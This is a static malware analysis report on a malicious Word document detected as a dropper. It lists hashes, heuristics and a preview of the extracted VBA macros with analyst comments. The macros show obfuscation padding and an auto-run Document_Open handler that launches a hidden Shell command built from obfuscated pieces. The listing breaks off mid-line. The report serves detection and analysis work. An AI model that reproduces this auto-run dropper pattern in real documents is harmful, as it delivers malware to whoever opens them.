Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b2fae0f252bdeaf3…

MALICIOUS

Office (OLE)

244.0 KB Created: 2018-07-20 07:26:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: dc251d4f51b272cdde77cc65944b2fd0 SHA-1: e918129a99c4e16b393098178b505cf857f04de3 SHA-256: b2fae0f252bdeaf36edc641de33455ae4d1591fa2998decd27879b7405f8b173
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic; T1059 Command and Scripting Interpreter; T1204.002 Malicious File

The sample is flagged as malicious by ClamAV and contains VBA macros. A critical heuristic fired on a Shell() call in the VBA code, indicating that the macro executes an external command — a technique commonly used to download and run additional malicious payloads.

Heuristics 5

  • ClamAV: Doc.Dropper.Agent-6616612-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6616612-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 53046 bytes
SHA-256: 6692cda462aaa2738ce8e1f25d3270e4638314eb60e93b4c94214736b5bc0c6e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "LjRpninnAwGiIj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: VB_Base = "1Normal.ThisDocument" indicates this is the
' document's own class module, so the Document_open handler further down is
' wired to the open event of the document itself. The module name is a
' random-looking string, matching the obfuscated identifiers used throughout
' the extracted source.
' Analyst note: filler routine with no observable effect. Each line assigns a
' name that is never read again in this preview, and the divisors are names
' that are never assigned (an unassigned Variant is Empty, which coerces to 0),
' so every line would raise a run-time error that "On Error Resume Next"
' swallows. Nothing visible in this preview calls this function; it looks like
' padding intended to defeat signature matching.
Private Function SvlwRVJiLq()
On Error Resume Next
   GjYccm = (96880 - ZtiGLf / hLFoX - uCjar - (68923 + wKLKQ + BDzfr / QUWlDn))
   QrwYa = (14253 - ViVhq / CppGcU - WzEzSG - (66205 + iqiBU + OwSjTq / wqzNuw))
   AtnLzm = (46884 - ioCkC / zPhYqC - OijOEH - (10020 + QfmGF + EWALi / pYKdGh))
   UXiWhh = (35885 - BFUYLm / qjWVnt - ZJdwa - (13885 + jXITW + Svimu / JRbzRo))
   HEfzi = (99856 - LGwuiT / OIPizp - sjNLRo - (80294 + DIXlj + LAoYF / sQDQz))
End Function
' Analyst note: filler routine; same pattern as the others in this module.
' Write-only assignments over never-assigned operands, with the resulting
' run-time errors suppressed by "On Error Resume Next". No caller is visible
' in this preview; treat as obfuscation padding rather than functionality.
Private Function wIXhGnoCjoX()
On Error Resume Next
   GWclNO = (30328 - JWpLt / LlwdfU - zGXCv - (29471 + AIFoV + vaiWzw / jDZwnt))
   TQFLNt = (86404 - clBuA / bzGPRK - BLzkiC - (71274 + PHhwnV + dwCBjN / TsjaHC))
   fwQjjC = (1305 - HKFHUA / UvvrJY - bUWrvJ - (89648 + stELzK + aTVXo / zSZlnv))
   pMRwRF = (10250 - jqHiMi / vNcvW - MQilL - (84981 + ADviz + RVhqE / XXTKYi))
   qPCQz = (27056 - QEjSz / QBRBq - wkHcih - (67424 + vhaPCF + KtCYVj / KZnhzZ))
   tjIZAX = (92516 - rHrsV / MCJBi - UcWlj - (78975 + BzGINM + zNwlw / ERbNjv))
   HvwzL = (39351 - nYiQfL / iUQtNF - PdULK - (50643 + oziJPu + fSEtd / FdpEEd))
End Function
' Analyst note: filler routine. Every assignment targets a name that is not
' read anywhere in this preview, and every divisor is a name that is never
' assigned, so the arithmetic cannot produce a usable value; errors are hidden
' by "On Error Resume Next". Not referenced by any code visible here.
Private Function oNfHTpcvnL()
On Error Resume Next
   FAHzj = (62267 - QcAaJZ / GdpWKt - PqGXvD - (27584 + IGGAj + IiDZH / GiimL))
   wwPqiI = (81527 - oPqdiH / NDMZrf - cGMWRK - (76915 + XsEDz + sVqrA / fnRFuz))
   wafvZ = (63347 - MwNXXU / ltFFCh - iMqQa - (58152 + pZuizN + wnPwB / cZapHn))
   DEINp = (11500 - pJAZn / hJTtUI - LwzmzD - (61389 + kIULsh + CAtRv / jzddl))
   iqhJX = (18787 - OpfwC / WZTsY - YoGqG - (453 + bIlAIn + XHiMV / DKhzjA))
   zLoSDK = (18178 - FVPla / EAfOuv - HSACN - (64569 + wVILZA + ZTCHiY / widfU))
End Function
' Analyst note: the auto-run entry point. Word invokes Document_Open when the
' document is opened (the OLE_VBA_DOCOPEN heuristic above), so this is where
' execution starts without further user action beyond enabling macros.
' The arithmetic lines are the same no-op filler as in the other routines.
' The Shell call is the actual payload: its command line is concatenated from
' roughly thirty variables, none of which is assigned anywhere in this preview
' (they are presumably populated elsewhere — another module, a form control or
' a document property — TODO confirm against the full extraction), so the
' command cannot be recovered statically from this listing alone. The second
' argument, 0, is vbHide, so the spawned process gets no visible window.
' Detection angle: a Word process creating a child process is the observable
' event; the heuristic engine's OLE_VBA_SHELL finding keys on this call.
Private Sub Document_open()
On Error Resume Next
   zStrL = (93485 - roCUPv / avNPG - mKtcJm - (75193 + oLtOsG + ELtoKX / TKaCUS))
   MHYbj = (74877 - RiYJo / dJGXo - WkUbw - (38961 + qiCGS + ccwlp / XIfuK))
   MIAMp = (60831 - KMWwKd / YNGIm - UhVivI - (61724 + SciaY + EzRpB / aAiPs))
   fBZFU = (27826 - linRQ / zisjnV - LwawRH - (53443 + TzGqF + AzsXO / AjZKz))
Shell "" + XpATffIzbsfc + wqObFoMbfX + CVar("c") + RBqpJLul + hianMdA + jjXAVw + GVNPKra + najLwBrK + ZtzGmqUjd + pwnAdOh + CFaRqrZnSwl + msGjo + kzVAqBbPmDz + jNHpi + wwIbNjUzB + iqvojz + wbNzF + wJMRlwtjA + AZbjsQf + btdDBFmzbc + AYWBFzTTbuY + GrSRazRJszB + PIfTkFR + wcvSuwTcE + qUzWlmPS + qJMvr + lICGVfSIqT + IqUtqSm + rIwbXDsh + nMmPRfjbKdz, 0
   LYJlfY = (31111 - smRQLA / TCKTYP - BZlPud - (47227 + rLIIn + NRNIK / vaVwFi))
End Sub
' Analyst note: filler routine. Write-only assignments whose operands are
' never assigned in this preview; any run-time error is suppressed by
' "On Error Resume Next". No visible caller — obfuscation padding.
Private Function CiwtsuRXMvNpsI()
On Error Resume Next
   ZoUVR = (25877 - qIRcXj / EjGSM - fKJiO - (68219 + LAzfT + LfzvR / bYfvzp))
   pksKo = (9472 - LhXia / tCTun - urzlzq - (75075 + OzJXsB + LAhRKz / nMVLq))
   nRRhi = (94044 - lPflH / naqKlJ - YsGop - (68440 + pzOMtK + lujQAW / aPSJJ))
   suuFR = (23219 - qztTBZ / NYApZ - hBldct - (54058 + mPnAo + WDORb / LVBozJ))
End Function
' Analyst note: filler routine, same pattern as the rest of the module. The
' assigned names are never read and the divisors are never assigned in this
' preview, so nothing here contributes to the Shell command built in
' Document_open. Errors are hidden by "On Error Resume Next"; no visible caller.
Private Function SfLkbWjA()
On Error Resume Next
   PjbBV = (77438 - ZOzsT / PKunSN - HdJdS - (14994 + bbiow + kiTmi / XqwKnF))
   dwPzW = (81761 - aPUiUk / Rjzquo - aILwOL - (91121 + oPuSi + zCEtB / icXfj))
   mYivFH = (6183 - bFlzK / jpbDm - PbQGY - (61732 + YLjdQz + YHQiQq / RbCWU))
   wrYDm = (6816 - DnEDH / EWbEoC - bTdtz - (87302 + OzlfMP + wLPMHO / DJwBl))
   ACFGpd = (41268 - mWzjN / hzjIv - OhrHE - (69154 + UJTWYj + PYWYz / tUwwp))
   AmvfOG = (27338 - HXWZK / CubUzj - bYznvH - (96608 + NkDLz + YlzCr / NztIq))
   wIBai = (19443 - iTLwCF / AFSAZA - IIaKJb - (20619 + kuSEPr + IsrND / wNXWth))
End Function
Private Function plMjChuLdsvLTl()
On Error Resume Next
   RTZDjm = (91055 - zAwkvL / tlltMm - dvWIau - (89155 + HvSZBa + WcVOPw / QHkab))
   szDCj = (13713 - kmowdn / fiwsKd - NHwrjG - (45153 + LtoOz + MzlQi / ctOiRX))
   hnHLop = (58024 - aLAiMs / RVJWF - JYwWf - (22648 + OYATzw + ILONk / qBJN
... (truncated)